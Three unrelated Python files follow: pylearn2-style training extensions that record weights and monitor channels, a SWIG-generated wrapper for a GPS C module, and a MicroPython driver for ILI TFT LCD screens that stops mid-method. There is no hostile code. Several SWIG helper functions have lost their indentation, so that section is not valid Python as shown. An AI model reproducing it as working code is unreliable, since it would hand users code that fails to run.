    Abstract extension whose findings can be persisted (typically to disk).
    """

    def store(self):
        """
        Persist the findings of this extension. The default implementation
        does nothing; subclasses override it.
        """
        pass
class WeightKeeper(PersistentTrainExtension):
    """
    keeps track of the model's weights at each monitor step

    This model stores weights *per monitor step* - the list grows large
    pretty quickly.
    """

    def __init__(self, **kwargs):
        # Instance attribute instead of the old mutable *class* attribute:
        # a class-level list is shared by every WeightKeeper instance that
        # is used without a prior setup() call.
        super(WeightKeeper, self).__init__(**kwargs)
        self._weights = []

    def on_monitor(self, model, dataset, algorithm):
        """
        save the model's weights
        """
        self._weights.append(model.get_param_values())

    def setup(self, model, dataset, algorithm):
        """
        initialize the weight list
        """
        self._weights = []

    def get_weights(self):
        """
        get weights history
        """
        return self._weights

    def store(self):
        """
        Pickle the recorded weights into the working directory.
        """
        path = os.path.join(self._wd, "weightkeeper.pkl")
        # Pickle streams are binary data: open in "wb" so the dump is not
        # corrupted by newline translation (and so the code also works on
        # Python 3).
        with open(path, "wb") as file_:
            pkl.dump(self._weights, file_)
class ProgressMonitor(PersistentTrainExtension):
    """
    Makes the monitor channel's history accessible to us.
    """
    # Sentinel until the first monitor step fills in the real record.
    _progress = np.NaN

    @classmethod
    def get_default_config(cls):
        config = super(ProgressMonitor, cls).get_default_config()
        config["channel"] = "valid_objective"
        return config

    def on_monitor(self, model, dataset, algorithm):
        """
        save the desired channel
        """
        # NOTE(review): self._channel is expected to be populated from the
        # "channel" config entry by the Buildable machinery — confirm.
        monitor = model.monitor
        channels = monitor.channels
        channel = channels[self._channel]
        self._progress = channel.val_record

    def get_progress(self):
        """
        get the value's history
        """
        return self._progress

    def store(self):
        """
        Pickle the recorded channel history into the working directory.
        """
        filename = "progress_{}.pkl".format(self._channel)
        path = os.path.join(self._wd, filename)
        # Pickle output is binary: "wb" avoids newline corruption and is
        # required on Python 3.
        with open(path, "wb") as file_:
            pkl.dump(self._progress, file_)
class MonitorBasedSaveBest(BuildableTrainExtension):
    """
    similar to pylearn2's MonitorBasedSaveBest, but avoids memory hogging
    (see https://github.com/lisa-lab/pylearn2/issues/1567)
    """
    best_cost = np.inf
    best_params = None

    @classmethod
    def get_default_config(cls):
        config = super(MonitorBasedSaveBest, cls).get_default_config()
        config["channel"] = "valid_objective"
        return config

    def setup(self, model, dataset, algorithm):
        """
        Reset the best-cost tracker and remember the initial parameters.
        """
        self.best_cost = np.inf
        self.best_params = model.get_param_values()

    def on_monitor(self, model, dataset, algorithm):
        """
        Keep a copy of the parameters whenever the monitored cost improves.

        Parameters
        ----------
        model : pylearn2.models.model.Model
            model.monitor must contain a channel with name given by
            self.channel_name
        dataset : pylearn2.datasets.dataset.Dataset
            Not used
        algorithm : TrainingAlgorithm
            Not used
        """
        latest_cost = model.monitor.channels[self._channel].val_record[-1]
        if latest_cost < self.best_cost:
            self.best_cost = latest_cost
            self.best_params = model.get_param_values()
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 4.0.1
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError("Python 2.7 or later required")
# Import the low-level C/C++ module
if __package__ or "." in __name__:
from . import _gps
else:
import _gps
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
def _swig_setattr_nondynamic_instance_variable(set):
    # SWIG-generated helper (regenerate from the .i interface file rather
    # than editing by hand). Wraps a type's __setattr__ so that instances
    # may only rebind existing attributes: "thisown"/"this" are forwarded
    # to the underlying SWIG pointer object, existing properties are set
    # normally, and assigning any brand-new attribute name raises
    # AttributeError (nondynamic instances).
    def set_instance_attr(self, name, value):
        if name == "thisown":
            self.this.own(value)
        elif name == "this":
            set(self, name, value)
        elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
            set(self, name, value)
        else:
            raise AttributeError("You cannot add instance attributes to %s" % self)
    return set_instance_attr
def _swig_setattr_nondynamic_class_variable(set):
    # SWIG-generated helper: class-level counterpart of the instance
    # variant above. Only existing, non-property class attributes may be
    # rebound; anything else raises AttributeError.
    def set_class_attr(cls, name, value):
        if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
            set(cls, name, value)
        else:
            raise AttributeError("You cannot add class attributes to %s" % cls)
    return set_class_attr
def _swig_add_metaclass(metaclass):
"""Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class _SwigNonDynamicMeta(type):
    """Meta class to enforce nondynamic attributes (no new attributes) for a class"""
    # Route class-attribute assignment through the SWIG guard defined above.
    __setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)
# Thin SWIG-generated wrappers delegating to the low-level _gps C module.
# Do not edit by hand -- regenerate from the SWIG interface file. Several
# callbacks shadow the builtin ``len``; that naming comes from the C
# prototypes and is kept as-is.
def gps_init(ip, port):
    # Initialise the GPS link to the given ip/port.
    return _gps.gps_init(ip, port)
def gps_finish():
    # Tear down the GPS link.
    return _gps.gps_finish()
def setup_socket():
    return _gps.setup_socket()
def close_socket():
    return _gps.close_socket()
def get_longitude():
    return _gps.get_longitude()
def get_latitude():
    return _gps.get_latitude()
def socket_read(buff, n, context):
    # Read up to n bytes into buff; semantics defined by the C side.
    return _gps.socket_read(buff, n, context)
def gps_thread():
    return _gps.gps_thread()
# SBP (Swift Binary Protocol) message callbacks, forwarded to C handlers.
def sbp_pos_llh_callback(sender_id, len, msg, context):
    return _gps.sbp_pos_llh_callback(sender_id, len, msg, context)
def sbp_baseline_ned_callback(sender_id, len, msg, context):
    return _gps.sbp_baseline_ned_callback(sender_id, len, msg, context)
def sbp_vel_ned_callback(sender_id, len, msg, context):
    return _gps.sbp_vel_ned_callback(sender_id, len, msg, context)
def sbp_dops_callback(sender_id, len, msg, context):
    return _gps.sbp_dops_callback(sender_id, len, msg, context)
def sbp_gps_time_callback(sender_id, len, msg, context):
    return _gps.sbp_gps_time_callback(sender_id, len, msg, context)
def sbp_imu_raw_callback(sender_id, len, msg, context):
    return _gps.sbp_imu_raw_callback(sender_id, len, msg, context)
# Exported C global variables live on this object.
cvar = _gps.cvar
|
# The MIT License (MIT)
# Copyright (c) 2016. <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# DESCRIPTION:
#
# lcd.py - contains ILI TFT LCD controllers driving classes
# Data transfer using 4-line Serial protocol (Series II)
# 16-bit RGB Color (R:5-bit; G:6-bit; B:5-bit)
# About 30Hz monocolor screen refresh
#
# Default is portrait mode:
# lcd = LCD([ portrait = True ])
# width is 240px
# height is 320px
#
# Setup landscape mode:
# lcd = LCD(portrait = False)
# width is 320px
# height is 240px
#
# Template method for orientation management by Accel:
# Changing mode on the fly by calling:
# lcd.portrait = True [or False]
#
# Users don't need to import fonts, they are imported by the python code
#    Available fonts:
# Arrows_15
# Arrows_23
# Vera_10
# Vera_m10
# Arial_14
# Vera_15
# Vera_m15
# VeraMono_15
# VeraMono_m15
# Pitch_m15
# Pitch_m23
# VeraMono_m23
# Heydings_23
# Entypo_13
# Entypo_23
#
# define fonts by typing in string format:
# s = lcd.initCh(color = (R,G,B), font = 'Arial_14', [scale = 1])
#
# You may change string objects font by:
# s.font = 'Arial_14'
#
# printing line:
# s.printLn('Hello, World', x, y, [ scale = 1 ])
#
# Smart label widget:
# lcd.label(x, y, bordercolor, infillcolor, string, strobj = s,
# [ border = 1, width = None, height = None ])
#
# if user defines the dimensions of the widget, micropython will
# compute the string length and will do word wrapping automatically.
import micropython
import os
from array import array
from gc import collect
from math import ceil, cos, radians, sin, trunc
from struct import pack, unpack
from time import sleep
from machine import SPI, Pin
from colors import *
from constants import *
# Reserve a buffer so exceptions raised inside interrupt handlers can still
# be reported (standard MicroPython practice).
micropython.alloc_emergency_exception_buf(100)
# The following three module-level constants locate image files and the
# image cache directory; they are used by the BaseImages class.
imgdir = 'images'
cachedir = 'cache'
imgcachepath = imgdir + '/' + cachedir
# NOTE(review): cache-directory auto-creation at import time is disabled;
# cacheAllImages() creates the directory on demand instead.
#if cachedir not in os.listdir(imgdir):
#    try:
#        os.mkdir(imgcachepath)
#    except OSError:
#        pass
class ILI(object):
    """
    Low-level driver for ILI93xx/94xx TFT controllers over the 4-line
    serial (SPI) protocol with 16-bit RGB565 color.

    Handles pin/SPI setup, hardware reset, controller initialisation,
    MADCTL orientation switching and raw command/data transfers.
    """
    _curwidth = 240     # current TFT width (portrait)
    _curheight = 320    # current TFT height (portrait)
    def __init__(self, cs = '22', dc = '21', rst = None, bl = None,
            port = VSPI, baud = DEFAULT_BAUDRATE, portrait = True):
        """
        Initialize ILI class.

        cs/dc    : chip-select and data/command pin ids (required)
        rst      : optional hardware reset pin id
        bl       : optional backlight pin id (switched on immediately)
        port     : HSPI or VSPI
        baud     : SPI baudrate
        portrait : initial orientation
        """
        if cs is None or dc is None:
            raise RuntimeError('cs and dc pins must not be None')
        if port not in [HSPI, VSPI]:
            raise RuntimeError('port must be HSPI or VSPI')
        self.csPin = Pin(cs, Pin.OUT)
        self.dcPin = Pin(dc, Pin.OUT)
        self.rstPin = None
        if rst is not None:
            self.rstPin = Pin(rst, Pin.OUT)
        self.blPin = None
        if bl is not None:
            self.blPin = Pin(bl, Pin.OUT)
            # Backlight on
            self.blPin.on()
        # BUGFIX: was "baudrate=rate" -- 'rate' is undefined here; the
        # constructor parameter is named 'baud'.
        self.spi = SPI(port, baudrate=baud)
        self._portrait = portrait
        self.curHeight = TFTHEIGHT
        self.curWidth = TFTWIDTH
        self.reset()
        # BUGFIX: was self.initDisplay(), which is defined nowhere in this
        # module; the controller init routine is _initILI().
        self._initILI()
        self._gcCollect()
    @micropython.viper
    def reset(self):
        """ Reset the screen via the hardware reset pin, if wired. """
        if self.rstPin is not None: # reset pin is connected to ESP32
            self.rstPin.off()
            sleep(0.01)
            self.rstPin.on()
        return
    @micropython.viper
    def _gcCollect(self):
        # Free heap between large buffer allocations.
        collect()
    @micropython.viper
    def setDimensions(self):
        """Recompute curWidth/curHeight for the current orientation and
        reprogram MADCTL."""
        # BUGFIX: was "if ILI.portrait:" -- that references the property
        # object on the class (always truthy), not this display's mode.
        if self._portrait:
            self.curHeight = TFTHEIGHT
            self.curWidth = TFTWIDTH
        else:
            self.curHeight = TFTWIDTH
            self.curWidth = TFTHEIGHT
        self._graph_orientation()
    @micropython.viper
    def _initILI(self):
        """Controller power-up sequence (reset, pixel format, gamma,
        entry mode, display on)."""
        self._write_cmd(LCDOFF)     # Display OFF
        sleep(0.01)
        self._write_cmd(SWRESET)    # Software Reset
        sleep(0.05)
        self._graph_orientation()
        self._write_cmd(PTLON)      # Partial Mode ON
        self._write_cmd(PIXFMT)     # Pixel Format Set
        #self._write_data(0x66)     # 18-Bit/Pixel
        self._write_data(0x55)      # 16-Bit/Pixel
        self._write_cmd(GAMMASET)
        self._write_data(0x01)
        self._write_cmd(ETMOD)      # Entry Mode Set
        self._write_data(0x07)
        self._write_cmd(SLPOUT)     # Exit Sleep Mode
        sleep(0.01)
        self._write_cmd(LCDON)      # Display ON
        sleep(0.01)
        self._write_cmd(RAMWR)
    def _write(self, word, command = True, read = False):
        """
        Raw SPI transfer. DC low = command, DC high = data. When read is
        True, clock out the command and read back a 5-byte response.
        """
        self.csPin.off()
        self.dcPin.value(0 if command else 1)
        if read:
            fmt = '>BI'
            data = bytearray(5)
            self.spi.write_readinto(pack(fmt, word), data)
            self.csPin.on()
            return data
        self.spi.write(word)
        # BUGFIX: was "slef.csPin.on()" -- NameError typo; chip-select was
        # never released after plain writes.
        self.csPin.on()
    def _decode_spi_data(self, data):
        """Convert a 5-byte RAMRD response into a packed RGB565 word."""
        # For example:
        # 1. receiving sets 5 bytes
        # 2. first 2 of them are useless (or null bytes)
        # 3. and just 3 last of them having a useful data:
        #    - those 3 bytes are RGB bytes (if we are reading from memory)
        #    - those 3 bytes have 7 useful bits (and doesn't matter which color is)
        #    - we must get from them:
        #      * just 5 largest bits for R and B colors
        #      * just 6 largest bits for G color
        # next 2 lines sort out the useful data
        # getting 4 last bytes
        data = unpack('<BI', data)[1]
        # reversing them
        data = pack('>I', data)
        # getting just 3 bytes from bytearray as BGR
        data = unpack('>3B', data)
        # with those 3 assignments we extract the useful bits per color
        red = (((data[2]>>2) & 31) << 11)
        green = (((data[1]>>1) & 63) << 5)
        blue = ((data[0]>>2) & 31)
        # combining them into one 16-bit color word
        data = red | green | blue
        data = pack('>H', data)
        return data
    def _write_cmd(self, word, read = False):
        """Send a command byte; returns the response when read is True."""
        data = self._write(word, read = read)
        return data
    def _write_data(self, word):
        """Send data byte(s) (DC high)."""
        self._write(word, command = False)
    def _write_words(self, words):
        """Pack a sequence of bytes into one data transfer."""
        wordL = len(words)
        # struct format ">B" for a single byte, ">NB" for N bytes
        wordL = wordL if wordL > 1 else ""
        fmt = '>{0}B'.format(wordL)
        words = pack(fmt, *words)
        self._write_data(words)
    @micropython.viper
    def _graph_orientation(self):
        """MADCTL mode used for general graphics drawing."""
        self._write_cmd(MADCTL)   # Memory Access Control
        # Portrait:
        # | MY=0 | MX=1 | MV=0 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
        # OR Landscape:
        # | MY=0 | MX=0 | MV=1 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
        data = 0x48 if self._portrait else 0x28
        self._write_data(data)
    @micropython.viper
    def _char_orientation(self):
        """MADCTL mode used while rendering characters."""
        self._write_cmd(MADCTL)   # Memory Access Control
        # Portrait:
        # | MY=1 | MX=1 | MV=1 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
        # OR Landscape:
        # | MY=0 | MX=1 | MV=1 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
        data = 0xE8 if self._portrait else 0x58
        self._write_data(data)
    @micropython.viper
    def _image_orientation(self):
        """MADCTL mode used while streaming BMP image data."""
        self._write_cmd(MADCTL)   # Memory Access Control
        # Portrait:
        # | MY=0 | MX=1 | MV=0 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
        # OR Landscape:
        # | MY=0 | MX=1 | MV=0 | ML=1 | BGR=1 | MH=0 | 0 | 0 |
        data = 0xC8 if self._portrait else 0x68
        self._write_data(data)
    def _set_window(self, x0, y0, x1, y1):
        """Define the drawing window and start a RAM write."""
        # Column Address Set
        self._write_cmd(CASET)
        self._write_words(((x0>>8) & 0xFF, x0 & 0xFF, (y0>>8) & 0xFF, y0 & 0xFF))
        # Page Address Set
        self._write_cmd(PASET)
        self._write_words(((x1>>8) & 0xFF, x1 & 0xFF, (y1>>8) & 0xFF, y1 & 0xFF))
        # Memory Write
        self._write_cmd(RAMWR)
    def _get_Npix_monoword(self, color):
        """Return one pixel of `color` packed as a big-endian RGB565 word."""
        if color == WHITE:
            word = 0xFFFF
        elif color == BLACK:
            word = 0
        else:
            R, G, B = color
            word = (R<<11) | (G<<5) | B
        word = pack('>H', word)
        return word
    def _return_chpos(self, chrwidth, scale):
        """Horizontal advance tweak for 1-column (narrow) glyphs."""
        if chrwidth == 1:
            chpos = scale + 1 if scale > 2 else scale - 1
        else:
            chpos = scale
        return chpos
    # Method written by MCHobby https://github.com/mchobby
    # Transform a RGB888 color to RGB565 color tuple.
    def rgbTo565(self, r, g, b):
        return (r>>3, g>>2, b>>3)
    @property
    def portrait(self):
        """Current orientation flag (True = portrait)."""
        return self._portrait
    @portrait.setter
    def portrait(self, portr):
        if not isinstance(portr, bool):
            from exceptions import PortraitBoolError
            raise PortraitBoolError
        self._portrait = portr
        self.setDimensions()
class BaseDraw(ILI):
    """Primitive drawing operations (pixels, lines, rectangles, circles)
    on top of the raw ILI window/data transfers."""
    def _set_ortho_line(self, width, length, color):
        # Stream width*(length+1) identical pixels into the current window.
        pixels = width * (length + 1)
        word = self._get_Npix_monoword(color) * pixels
        self._write_data(word)
    def drawPixel(self, x, y, color):
        # One-pixel window, one pixel of data.
        self._set_window(x, x, y, y)
        self._write_data(self._get_Npix_monoword(color))
    def drawVline(self, x, y, length, color, width = 1):
        # Vertical line; length clamped to the screen, width capped at 10.
        if length > self.curHeight: length = self.curHeight
        if width > 10: width = 10
        self._set_window(x, x + (width - 1), y, y + length - 1)
        self._set_ortho_line(width, length, color)
    def drawHline(self, x, y, length, color, width = 1):
        # Horizontal line; length clamped to the screen, width capped at 10.
        if length > self.curWidth: length = self.curWidth
        if width > 10: width = 10
        self._set_window(x, x + length - 1, y, y + (width - 1))
        self._set_ortho_line(width, length, color)
    # Method written by MCHobby https://github.com/mchobby
    # TODO:
    #   1. support border > 1
    def drawLine(self, x, y, x1, y1, color):
        # Bresenham-like line: axis-aligned cases delegate to
        # drawVline/drawHline; diagonals are drawn as short orthogonal
        # segments, stepping along the axis with the smaller ratio.
        if x == x1:
            self.drawVline( x, y if y <= y1 else y1, abs(y1 - y), color )
        elif y==y1:
            self.drawHline( x if x <= x1 else x1, y, abs(x-x1), color )
        else:
            # keep positive range for x
            if x1 < x:
                x, x1 = x1, x
                y, y1 = y1, y
            r = (y1 - y) / (x1 - x)
            # select ratio > 1 for fast drawing (and thin line)
            if abs(r) >= 1:
                for i in range(x1 - x + 1):
                    if (i == 0): # always start at a point
                        self.drawPixel(x + i, trunc(y + (r * i)), color)
                    else:
                        # r may be negative when drawing the wrong way > Fix it when drawing
                        self.drawVline(x + i, trunc(y + (r * i) - r) + (0 if r > 0 else trunc(r)), abs(trunc(r)), color)
            else:
                # keep positive range for y
                if y1 < y:
                    x, x1 = x1, x
                    y, y1 = y1, y
                # invert the ratio (should be close of r = 1/r)
                r = (x1 - x) / (y1 - y)
                for i in range(y1 - y + 1):
                    if (i == 0):
                        self.drawPixel(trunc(x + (r * i)), y + i, color)
                    else:
                        # r may be negative when drawing the wrong way > fix it to draw positive
                        self.drawHline(trunc(x + (r * i) - r) + (0 if r > 0 else trunc(r)), y + i, abs(trunc(r)), color)
    def drawRect(self, x, y, width, height, color, border = 1, infill = None):
        # Rectangle with optional border thickness (capped at 10) and
        # optional fill color. border == 0 means a fully filled rectangle.
        if border is None:
            border = 0
        border = 10 if border > 10 else border
        if width > self.curWidth:
            width = self.curWidth
        if height > self.curHeight:
            height = self.curHeight
        height = 2 if height < 2 else height
        width = 2 if width < 2 else width
        self._graph_orientation()
        if border > 0:
            if border > width // 2:
                border = width // 2 - 1
            X, Y = x, y
            # Two passes: i == 0 draws the top/left edges, i == 1 the
            # bottom/right edges.
            for i in range(2):
                Y = y + height - (border - 1) if i == 1 else y
                self.drawHline(X, Y, width, color, border)
                if border > 1:
                    Y = y + 1
                    H = height
                else:
                    Y = y
                    H = height + 1
                X = x + width - (border - 1) if i == 1 else x
                self.drawVline(X, Y, H, color, border)
        else:
            # borderless rectangle: fill with the outline color
            infill = color
        if infill:
            xsum = x + border
            ysum = y + border
            dborder = border * 2
            self._set_window(xsum, xsum + width - dborder, ysum, ysum + height - dborder)
            # The fill is streamed in `times` chunks of `pixels` pixels to
            # bound peak RAM usage. If MemoryError, try to set higher
            # portion value.
            portion = 32
            pixels = width * (height // portion + 1)
            pixels = pixels if height >= portion else (width * height) // 3 + 1
            times = 16 * 2 if height < portion + 1 else portion + 1
            self._gcCollect()
            word = self._get_Npix_monoword(infill) * pixels
            i = 0
            while i < (times):
                self._write_data(word)
                i+=1
        self._gcCollect()
    def fillMonocolor(self, color, margin = 0):
        # Fill the whole screen (minus an optional margin, capped at 80px)
        # with a single color.
        margin = 80 if margin > 80 else margin
        width = self.curWidth - margin * 2
        height = self.curHeight - margin * 2
        self.drawRect(margin, margin, width, height, color, border = 0)
    def _get_x_perimeter_point(self, x, degrees, radius):
        # x coordinate of the point `degrees` around a circle of `radius`.
        sinus = sin(radians(degrees))
        x = trunc(x + (radius * sinus))
        return x
    def _get_y_perimeter_point(self, y, degrees, radius):
        # y coordinate of the point `degrees` around a circle of `radius`.
        cosinus = cos(radians(degrees))
        y = ceil(y - (radius * cosinus))
        return y
    def drawCircle(self, x, y, radius, color, border = 1, degrees = 360, startangle = 0):
        # Circle outline drawn as short horizontal dashes every half degree;
        # partial arcs via degrees/startangle. Border capped at 5.
        border = 5 if border > 5 else border
        self._graph_orientation()
        # adding startangle to degrees
        if startangle > 0:
            degrees += startangle
        if border > 1:
            radius = radius-border // 2
        degp = 0.5
        quotient = int(divmod(1, degp)[0])
        for i in range(startangle, degrees):
            # sub-steps of degp degrees within each whole degree
            for j in tuple(i + degp * j for j in range(1, quotient + 1)):
                X = self._get_x_perimeter_point(x + degp, j, radius)
                Y = self._get_y_perimeter_point(y + degp, j, radius)
                self.drawHline(X, Y, border, color, border)
    def drawCircleFilled(self, x, y, radius, color):
        # Filled circle as a stack of horizontal chords, one per degree of
        # the right half (mirrored via the 360-i left x coordinate).
        tempY = 0
        self._graph_orientation()
        for i in range(180):
            xNeg = self._get_x_perimeter_point(x, 360 - i, radius - 1)
            xPos = self._get_x_perimeter_point(x, i, radius)
            if i > 89:
                Y = self._get_y_perimeter_point(y, i, radius - 1)
            else:
                Y = self._get_y_perimeter_point(y, i, radius + 1)
            if i == 90: xPos = xPos - 1
            # only draw when we advance to a new scanline
            if tempY != Y and tempY > 0:
                length = xPos + 1
                self.drawHline(xNeg, Y, length - xNeg, color, width = 4)
            tempY = Y
    def drawOvalFilled(self, x, y, xradius, yradius, color):
        # Filled ellipse using the same chord-stacking approach as
        # drawCircleFilled, with independent x/y radii.
        tempY = 0
        self._graph_orientation()
        for i in range(180):
            xNeg = self._get_x_perimeter_point(x, 360 - i, xradius)
            xPos = self._get_x_perimeter_point(x, i, xradius)
            Y = self._get_y_perimeter_point(y, i, yradius)
            if i > 89: Y = Y - 1
            if tempY != Y and tempY > 0:
                length = xPos + 1
                self.drawHline(xNeg, Y, length - xNeg, color, width = 4)
            tempY = Y
class BaseChars(ILI, BaseDraw):
    """
    Bitmap-font text rendering. Fonts are imported lazily from the
    `fonts` module; glyphs are streamed as two-color (font/background)
    pixel runs.
    """
    def __init__(self, color = BLACK, font = None, bgcolor = None, scale = 1, **kwargs):
        """
        color   : font color (RGB565 tuple or WHITE/BLACK constant)
        font    : font name string, e.g. 'Arial_14' (required)
        bgcolor : fixed background color; when None the background is read
                  back from the display per character
        scale   : integer glyph scale factor
        """
        super(BaseChars, self).__init__(**kwargs)
        self.fontColor = color
        if font is not None:
            import fonts
            self._gcCollect()
            font = fonts.importing(font)
            self._font = font
            del(fonts)
        else:
            from exceptions import NoneTypeFont
            raise NoneTypeFont
        # Store the background pre-packed as a pixel word when given.
        self.bgcolor = bgcolor if bgcolor is None else self._get_Npix_monoword(bgcolor)
        self._fontscale = scale
    @staticmethod
    @micropython.asm_thumb
    def _asm_get_charpos(r0, r1, r2):
        # r0 * r1 + r2 (+ carry): glyph x-advance in one instruction pair.
        mul(r0, r1)
        adc(r0, r2)
    @micropython.viper
    def _get_bgcolor(self, x, y):
        """Read back the pixel at (x, y) to use as the glyph background."""
        self._set_window(x, x, y, y)
        data = self._write_cmd(RAMRD, read = True)
        # BUGFIX: was self._decode_recv_data(data) -- no such method exists;
        # the response decoder defined on ILI is _decode_spi_data().
        data = self._decode_spi_data(data)
        return data
    def _set_word_length(self, data):
        # Glyph rows are stored with a leading marker bit; bin(data)[3:]
        # strips "0b" plus that marker, then repeats per scale factor.
        return bin(data)[3:] * self._fontscale
    def _fill_bicolor(self, data, x, y, width, height, scale=None):
        """Expand a glyph bitmap into background/foreground pixel words and
        stream it into the character window."""
        bgcolor = self._get_bgcolor(x, y) if not self.bgcolor else self.bgcolor
        color = self.fontColor
        self._set_window(x, x + (height * scale) - 1, y, y + (width * scale))
        bgpixel = bgcolor * scale
        pixel = self._get_Npix_monoword(color) * scale
        words = ''.join(map(self._set_word_length, data))
        self._gcCollect()
        # '0' bits become background pixels, '1' bits foreground pixels.
        words = bytes(words, 'ascii').replace(b'0', bgpixel).replace(b'1', pixel)
        self._write_data(words)
        self._graph_orientation()
    def printChar(self, char, x, y, scale = None):
        """Draw a single character at (x, y). Unknown glyphs are rendered
        as a placeholder rectangle."""
        if scale is None:
            scale = self._fontscale
        font = self._font
        # BUGFIX: was "self.fontscale = ..." -- Chars exposes fontscale as a
        # getter-only property, so assigning through it raised
        # AttributeError; write the backing attribute directly.
        self._fontscale = scale = 5 if scale >= 5 else scale
        index = ord(char)
        height = font['height']
        try:
            chrwidth = len(font[index]) * scale
            data = font[index]
        except KeyError:
            # Glyph missing from the font: fall back to a box placeholder.
            data = None
            chrwidth = font['width'] * scale
        # Character mode is rotated, so swap/mirror the coordinates.
        X = self.curHeight - y - (height * scale) + scale
        Y = x
        self._char_orientation()
        self._gcCollect()
        if data is None:
            self._graph_orientation()
            self.drawRect(x, y, height, chrwidth, self.fontColor, border = 2 * scale)
        else:
            self._fill_bicolor(data, X, Y, chrwidth, height, scale = scale)
    def printLn(self, string, x, y, bc = False, scale = None, strlen = None):
        """
        Print a string with word wrapping at `strlen` pixels (defaults to
        screen width minus 10) and newline support.
        NOTE(review): parameter `bc` is currently unused -- confirm intent.
        """
        if scale is None:
            scale = self._fontscale
        # if typed string length higher than strlen, string printing in new line
        strlen = self.curWidth - 10 if strlen is None else strlen
        # BUGFIX: was "font = self.font" -- BaseChars defines no `font`
        # attribute/property (only the Chars subclass does); use the
        # backing attribute so this works on any instance.
        font = self._font
        X, Y = x, y
        scale = 3 if scale > 3 else scale
        for line in string.split('\n'):
            for word in line.split(' '):
                lnword = len(word)
                # estimated pixel width if this word is appended
                outofd = x + lnword * (font['width'] - font['width'] // 3) * scale
                if outofd >= strlen:
                    # wrap to the next text row
                    x = X
                    y += (font['height'] + 2) * scale
                for i in range(lnword):
                    chrwidth = len(font[ord(word[i])])
                    self.printChar(word[i], x, y, scale = scale)
                    chpos = self._return_chpos(chrwidth, scale)
                    x += self._asm_get_charpos(chrwidth, chpos, 3)
                # advance by a space after each word
                x += self._asm_get_charpos(font['width'] // 4, chpos, 3)
            # newline: reset x, advance y
            x = X
            y += (font['height'] + 2) * scale
class BaseImages(ILI):
    """BMP rendering and caching. Cached images are pre-byte-swapped
    RGB565 streams stored under images/cache/ for fast replay."""
    # solution from forum.micropython.org
    @staticmethod
    @micropython.asm_thumb
    def _reverse(r0, r1):
        # In-place byte swap of a buffer (r0 = address, r1 = length):
        # converts little-endian 16-bit pixel data to the panel's order.
        b(loopend)
        label(loopstart)
        ldrb(r2, [r0, 0])
        ldrb(r3, [r0, 1])
        strb(r3, [r0, 0])
        strb(r2, [r0, 1])
        add(r0, 2)
        label(loopend)
        sub(r1, 2)
        bpl(loopstart)
    @micropython.viper
    def _set_image_headers(self, f):
        """Validate the 'BM' magic and return [startbit, width, height]
        read from the BMP header.
        NOTE(review): fields are read as 2-byte values although BMP stores
        4-byte ints -- works only for images smaller than 65536px per side
        and data offsets below 64KiB; confirm acceptable."""
        headers = []
        if f.read(2) != b'BM':
            from exceptions import BMPvalidationError
            raise BMPvalidationError
        for pos in (10, 18, 22): # startbit, width, height
            f.seek(pos)
            headers.append(unpack('<H', f.read(2))[0]) # read two bytes
        return headers
    def _get_image_points(self, pos, width, height):
        # Explicit (x, y) position, or center the image on screen.
        if isinstance(pos, (list, tuple)):
            x, y = pos
        else:
            x = 0 if width == self.curWidth else (self.curWidth - width) // 2
            y = 0 if height == self.curHeight else (self.curHeight - height) // 2
        return x, y
    def _write_from_bmp(self, f, memread):
        # Read one chunk, byte-swap it, and push it to the display.
        data = bytearray(f.read(memread))
        self._reverse(data, len(data))
        self._write_data(data)
    # Using in renderBmp method
    def _render_bmp_image(self, filename, pos):
        """Stream an uncached BMP straight from flash, swapping bytes on
        the fly in 512-byte chunks."""
        path = imgdir + '/'
        memread = 512
        with open(path + filename, 'rb') as f:
            startbit, width, height = self._set_image_headers(f)
            if width < self.curWidth:
                width -= 1
            x, y = self._get_image_points(pos, width, height)
            self._set_window(x, (width) + x, y, (height) + y)
            f.seek(startbit)
            # read until the filesystem signals end of data
            while True:
                try:
                    data = bytearray(f.read(memread))
                    self._reverse(data, len(data))
                    self._write_data(data)
                except OSError:
                    break
    # Using in renderBmp method
    def _render_bmp_cache(self, filename, pos):
        """Replay a pre-swapped cache file; larger chunks since no
        per-chunk byte swapping is needed."""
        filename = filename + '.' + cachedir
        # cache layout: two 'H'-packed size lines, then raw pixel data
        startbit = 8
        memread = 1024 * 6
        self._gcCollect()
        with open(imgcachepath + '/' + filename, 'rb') as f:
            width = unpack('H', f.readline())[0]
            height = unpack('H', f.readline())[0]
            print(filename, 'sizes:', str(width) + 'x' + str(height))
            if width < self.curWidth:
                width -= 1
            x, y = self._get_image_points(pos, width, height)
